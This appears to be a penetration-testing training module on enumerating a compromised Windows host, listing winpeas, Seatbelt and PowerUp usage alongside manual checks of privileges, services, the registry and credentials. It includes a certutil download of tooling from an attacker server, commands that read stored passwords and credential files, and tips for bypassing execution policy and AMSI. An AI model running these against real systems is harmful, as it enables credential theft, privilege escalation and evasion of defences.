Back to All Modules

Windows Local Enumeration

#Overview

Windows local enumeration is performed after gaining access to a Windows host (via WinRM, RDP, Meterpreter, or webshell). The goal is to gather user context, identify privilege escalation vectors, discover domain information, locate credentials, and assess the security posture of the host. Windows provides many built-in tools (whoami, net, sc, schtasks, wmic, PowerShell cmdlets) and there are excellent third-party enumeration scripts (winpeas, Seatbelt, PowerUp, SharpUp) that automate the process.

#Prerequisites

  • Tools: winpeas.exe, Seatbelt.exe, PowerUp.ps1, SharpUp.exe, PowerView.ps1, PowerMad.ps1, Rubeus.exe
  • Access Level: Shell access on Windows host (PowerShell, cmd)
  • File Transfer: Evil-WinRM upload, certutil download, IEX cradle, SMB share, Impacket smbserver

#Detection & Enumeration

#Automated Enumeration Tools

winpeas.exe (Primary Automated Tool)

# Upload via Evil-WinRM
*Evil-WinRM* PS> upload winpeas.exe
*Evil-WinRM* PS> .\winpeas.exe

# Download from attacker HTTP server
certutil -urlcache -f http://10.10.14.41/winpeas.exe winpeas.exe
.\winpeas.exe

# Key winpeas sections:
# - "System Information" (OS version, hotfixes, architecture)
# - "Users" (local and domain, groups)
# - "Services" (unquoted paths, modifiable binaries)
# - "Scheduled Tasks" (writable scripts)
# - "Installed Software" (vulnerable versions)
# - "Network" (interfaces, routes, listening ports)
# - "Windows Credentials" (Credential Manager, DPAPI)
# - "AutoLogon Credentials"
# - "AlwaysInstallElevated Registry Check"
POWERSHELL

Seatbelt.exe (Situational Awareness)

# All checks (be selective in production)
.\Seatbelt.exe -group=all

# Specific checks:
.\Seatbelt.exe -group=user           # User context and groups
.\Seatbelt.exe -group=system         # OS, patches, environment
.\Seatbelt.exe -group=misc           # Interesting files, Chrome data, Putty sessions
.\Seatbelt.exe OSInfo
.\Seatbelt.exe WindowsCredentialFiles
.\Seatbelt.exe InterestingProcesses
.\Seatbelt.exe LocalGPO
POWERSHELL

PowerUp.ps1 / SharpUp.exe (Privilege Escalation Focus)

# PowerUp (PowerShell)
. .\PowerUp.ps1
Invoke-AllChecks

# SharpUp (C# compiled, fewer PowerShell restrictions)
.\SharpUp.exe audit

# Key misconfigurations detected:
# - Unquoted service paths
# - Service binary permissions (modifiable by current user)
# - AlwaysInstallElevated registry keys
# - DLL hijacking via PATH
POWERSHELL

#Manual Enumeration Commands

User Context and Privileges

# Full user information
whoami /all

# Check specific privileges
whoami /priv

# Key privileges that enable privilege escalation:
# SeImpersonatePrivilege   -- Potato family exploits (Juicy, Rogue, PrintSpoofer)
# SeAssignPrimaryTokenPrivilege  -- Potato exploits
# SeBackupPrivilege         -- Backup operators can read any file
# SeRestorePrivilege        -- Can write any file
# SeDebugPrivilege          -- Can debug/impersonate any process
# SeTakeOwnershipPrivilege  -- Can take ownership of any securable object
# SeTcbPrivilege            -- "Act as part of operating system"

# Group membership
whoami /groups
net user %USERNAME%
net user %USERNAME% /domain

# Local users
net user
POWERSHELL

System Information

# OS version and architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

# Installed hotfixes (patches)
wmic qfe get Caption,Description,HotFixID,InstalledOn
systeminfo | findstr /C:"KB"

# WES-NG (Windows Exploit Suggester - Next Generation)
# Run on attacker machine with systeminfo output:
./wes.py systeminfo.txt --impact "Elevation of Privilege"

# Installed software
wmic product get name,version,vendor
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
POWERSHELL

Service Enumeration

# List all services
sc query state= all
Get-Service

# Detailed service configuration (binary path, start name)
sc qc <ServiceName>

# Check service binary permissions
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -qucw <BinaryPath>

# Unquoted service path detection
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """"

# Writable service binary checks
icacls "C:\Program Files\Vulnerable\service.exe"

# Service registry permissions
Get-Acl HKLM:\System\CurrentControlSet\Services\* | Format-List
POWERSHELL

Scheduled Tasks

# List all scheduled tasks
schtasks /query /fo LIST /v

# More readable output
schtasks /query /fo TABLE /v | findstr /i "TaskName"

# Find tasks running as SYSTEM with writable scripts
schtasks /query /fo LIST /v | findstr /i "SYSTEM\|Task To Run"

# Scheduled task folder (check script permissions)
dir C:\Windows\System32\Tasks\
POWERSHELL

Registry Enumeration

# AlwaysInstallElevated (both keys must be set to 1 for MSI escalation)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# AutoRuns (startup programs)
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Image File Execution Options (IFEO) -- debugger hijack
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

# LSA Protection
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL

# Credential caching
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CachedLogonsCount

# Winlogon autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
POWERSHELL

Network Enumeration

# Interface and routing information
ipconfig /all
route print
arp -a

# Active connections and listening ports
netstat -ano
netstat -anob   # includes process name (may require admin)

# DNS cache
ipconfig /displaydns

# Hosts file entries (check for internal redirections)
type C:\Windows\System32\drivers\etc\hosts
POWERSHELL

Firewall Status

# Legacy firewall (netsh)
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all dir=in | findstr "Rule\|Enabled\|Action\|LocalPort"

# PowerShell firewall
Get-NetFirewallProfile | Format-Table Name, Enabled
Get-NetFirewallRule | Where-Object { $_.Enabled -eq 'True' -and $_.Direction -eq 'Inbound' } | Format-Table DisplayName, Action, Protocol

# Check if firewall is disabled (common in CTF/HTB)
Get-NetFirewallProfile | Select-Object Name, Enabled
POWERSHELL

AV/EDR Detection

# Windows Defender status
Get-MpComputerStatus | Select-Object AntivirusEnabled, AMServiceEnabled, RealTimeProtectionEnabled, AntispywareEnabled

# Check for Defender service
sc query windefend

# Check for other security products
Get-Process | Where-Object { $_.ProcessName -like "*defender*" -or $_.ProcessName -like "*sentinel*" -or $_.ProcessName -like "*crowd*" -or $_.ProcessName -like "*carbon*" }

# AMSI status (Anti-Malware Scan Interface)
# AMSI affects PowerShell script execution -- check context
POWERSHELL

PowerShell Context

# PowerShell version
$PSVersionTable

# Language mode (ConstrainedLanguage mode restricts .NET calls)
$ExecutionContext.SessionState.LanguageMode

# Execution Policy
Get-ExecutionPolicy -List

# Check if PowerShell logging is enabled
Get-ItemProperty HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell
POWERSHELL

Domain Information (if domain-joined)

# Get domain info via ActiveDirectory module (pre-installed on DCs)
Get-ADDomain

# Computer account quota (controls how many computers a user can add)
Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota

# Domain controller
Get-ADDomainController

# Domain users
Get-ADUser -Identity username -Properties *
Get-ADUser -Filter * | Select-Object Name, SamAccountName

# Group membership
Get-ADGroupMember -Identity "Domain Admins"
whoami /groups

# msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD check)
Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity
POWERSHELL

Credential Discovery

# Saved RDP connections
cmdkey /list

# Credential Manager vault
vaultcmd /list

# Windows autologon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Stored credentials in files
dir C:\Users\*\AppData\Roaming\Microsoft\Credentials\ /s
dir C:\Users\*\AppData\Local\Microsoft\Credentials\ /s

# Search for interesting files
dir C:\*.xml,*.config,*.ini,*.txt,*.kdbx /s /b
Get-ChildItem -Path C:\Users\ -Include *.xml,*.txt,*.kdbx,*.ini,*.config -Recurse -ErrorAction SilentlyContinue

# PowerShell history
Get-Content (Get-PSReadlineOption).HistorySavePath
type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
POWERSHELL

#Common Pitfalls

  • Running winpeas without the .exe extension. Windows requires it. Use .\winpeas.exe, not .\winpeas.
  • Forgetting to import PowerShell modules before calling function. Always . .\PowerView.ps1 (dot-source) before using PowerView functions.
  • whoami /priv showing SeImpersonatePrivilege as disabled. The "Disabled" state is normal -- it CAN be enabled and used. The presence of the privilege is what matters.
  • Services appearing unquoted in wmic service but actually being properly quoted in the registry. Always verify with the registry or sc qc.
  • wmic product get name is notoriously slow and generates Event ID 1035 (MsiInstaller recon) on every installed MSI package. Prefer registry enumeration of uninstall keys.
  • Checking AlwaysInstallElevated but forgetting BOTH registry keys must be set. HKLM and HKCU both need the value 1.
  • PowerShell execution policy blocking scripts. Use powershell -ep bypass to override.
  • AMSI blocking known offensive PowerShell scripts. Use obfuscation or compile tools as .exe (SharpUp instead of PowerUp) to evade.

#OPSEC Considerations

  • winpeas.exe generates extensive system query activity (registry reads, service enumeration, file checks). The sheer volume of operations from one binary is a strong IOC.
  • whoami /all and whoami /priv are common reconnaissance commands and are monitored by many EDR products. However, they are also legitimate admin commands, making detection reliant on behavioral context.
  • wmic product get queries the MSI database and generates Event ID 1035 for every product listed. This is a well-known IOC used by attackers to enumerate installed software.
  • PowerShell execution with -ep bypass is flagged by script block logging (Event ID 4104). Constrained language mode may block certain PowerShell operations regardless of execution policy.
  • AMSI (Anti-Malware Scan Interface) scans all PowerShell script content before execution. Known scripts (PowerView, PowerUp) are signatured. Compile tools to EXE/DLL to bypass.
  • netstat -ano and ipconfig /all are normal admin commands and blend in well with legitimate activity.
  • Reading registry keys related to passwords (Winlogon autologon, LSA secrets) triggers access alerts on monitored systems.
  • Uploading tools via Evil-WinRM generates SMB/CIFS traffic that is logged. Evil-WinRM uses WinRM (HTTP/5985 or HTTPS/5986), which is also logged by IIS/WinRM logs.
  • Domain enumeration from a non-DC host (Get-ADDomain, Get-ADUser) generates LDAP queries that are logged at the DC. The source host of the queries is recorded.

#Post-Exploitation Value

  • User privileges (SeImpersonate, SeBackup, SeDebug) directly map to known privilege escalation techniques.
  • Service misconfigurations (unquoted paths, writable binaries) provide reliable privesc paths.
  • AutoLogon credentials immediately grant lateral movement to the auto-logon user.
  • AlwaysInstallElevated allows crafting malicious MSI installers that run as SYSTEM.
  • Domain enumeration reveals group membership that may enable RBCD, DCSync, or other AD attacks.
  • Credential files (unattend.xml, web.config, group policy preferences) often contain cleartext or decryptable passwords.
  • Patch enumeration reveals known vulnerabilities that can be exploited for privilege escalation.

#Cross-References

#Tool References

ToolDescriptionLink
winpeas.exeComprehensive Windows privilege escalation enumeratorhttps://github.com/peass-ng/PEASS-ng
Seatbelt.exeC# situational awareness toolhttps://github.com/GhostPack/Seatbelt
PowerUp.ps1PowerShell privilege escalation checkerhttps://github.com/PowerShellMafia/PowerSploit
SharpUp.exeC# privilege escalation checkerhttps://github.com/GhostPack/SharpUp
PowerView.ps1PowerShell Active Directory reconhttps://github.com/PowerShellMafia/PowerSploit
PowerMad.ps1PowerShell machine account manipulationhttps://github.com/Kevin-Robertson/Powermad
SharpHound.exeBloodHound data collectorhttps://github.com/BloodHoundAD/BloodHound
Rubeus.exeKerberos interaction toolhttps://github.com/GhostPack/Rubeus
WES-NGWindows Exploit Suggester Next Generationhttps://github.com/bitsadmin/wesng
accesschk.exeSysinternals permission checkerhttps://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
Evil-WinRMPowerShell Remoting clienthttps://github.com/Hackplayers/evil-winrm

#Source Machines

  • Sauna (Easy, AD) -- WinPEAS reveals AutoLogon for svc_loanmanager; BloodHound shows DCSync rights
  • Forest (Easy, AD) -- SharpHound collection reveals Account Operators membership and Exchange Windows Permissions WriteDacl
  • Support (Easy, Windows) -- PowerView/PowerMad for domain enumeration and RBCD attack
  • Manager (Medium, AD/Windows) -- certipy AD CS enumeration reveals ESC7 vulnerability
  • Authority (Medium, AD/Windows) -- certipy finds ESC1 vulnerable CorpVPN template; addcomputer.py for machine account; PassTheCert for RBCD